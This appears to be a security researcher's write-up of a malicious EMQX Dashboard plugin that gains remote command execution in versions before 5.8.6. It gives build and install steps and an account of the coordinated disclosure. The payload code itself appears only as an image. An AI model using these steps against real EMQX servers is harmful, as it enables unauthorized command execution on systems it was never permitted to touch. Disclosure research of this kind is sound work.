RCE via malicious plugin in EMQX Dashboard

This is a malicious plugin for EMQX Dashboard which allows to execute commands remotely in versions below 5.8.6. Written in Erlang, it is based on one of the latest releases of the EMQX plugin template repository.

Useful links:

  • EMQX-RCE: Repository containing the malicious plugin code.

  • EMQX Dashboard: The affected software, vulnerable until version 5.8.5 (included).

  • EMQX plugin template repository: Template for legitimate plugins (>99,9% of the code).

  • EMQX Docs: Instructions to launch a Docker image if you want to give this a try.


Plugin Compilation

  1. Install all the necessary dependencies, Erlang and rebar3. In the latest Kali release (Kali 2024.4) you can use:
sudo apt update
sudo apt install -y build-essential autoconf libncurses5-dev libssl-dev \
    libwxgtk3.2-dev libgl1-mesa-dev libglu1-mesa-dev libpng-dev \
    libssh-dev unixodbc-dev cmake
git clone https://github.com/asdf-vm/asdf.git ~/.asdf --branch v0.13.1
echo '. "$HOME/.asdf/asdf.sh"' >> ~/.bashrc
echo '. "$HOME/.asdf/completions/asdf.bash"' >> ~/.bashrc
source ~/.bashrc
asdf --version
asdf plugin-add erlang https://github.com/asdf-vm/asdf-erlang.git
asdf install erlang 25.3
asdf global erlang 25.3
wget https://s3.amazonaws.com/rebar3/rebar3
chmod +x rebar3
sudo mv rebar3 /usr/local/bin/
  1. Create the necessary directory and clone the plugin repository:
mkdir -p ~/.config/rebar3/templates/emqx-plugin-template
git clone https://github.com/ricardojoserf/emqx-RCE ~/.config/rebar3/templates/emqx-plugin-template
  1. (Optional) Modify the command to be executed by updating line 47 in “src/emqx_plugin_template.erl”:

img

  1. Generate the plugin as a tar.gz file:
rebar3 new emqx-plugin my_emqx_plugin
make -C my_emqx_plugin rel
cp my_emqx_plugin/_build/default/emqx_plugrel/my_emqx_plugin-1.0.0.tar.gz .
  1. Install and run via the EMQX Dashboard under the “Plugin” section.


Disclosure

Following discussions with the EMQX security team in February and March 2025, they confirmed that this is not considered a vulnerability but rather a “feature” and have no objections to making this repository public.

However, starting from version 5.8.6 (released on 25/3/25), this feature will be mitigated by introducing “a CLI command to explicitly allow the package before installing a plugin via the HTTP API or Dashboard, improving security and preventing unauthorized installations” (source).

Therefore, in earlier versions having access to the EMQX Dashboard you can achieve RCE, but in versions after 5.8.6 you will get this error:

img


Written on March 27, 2025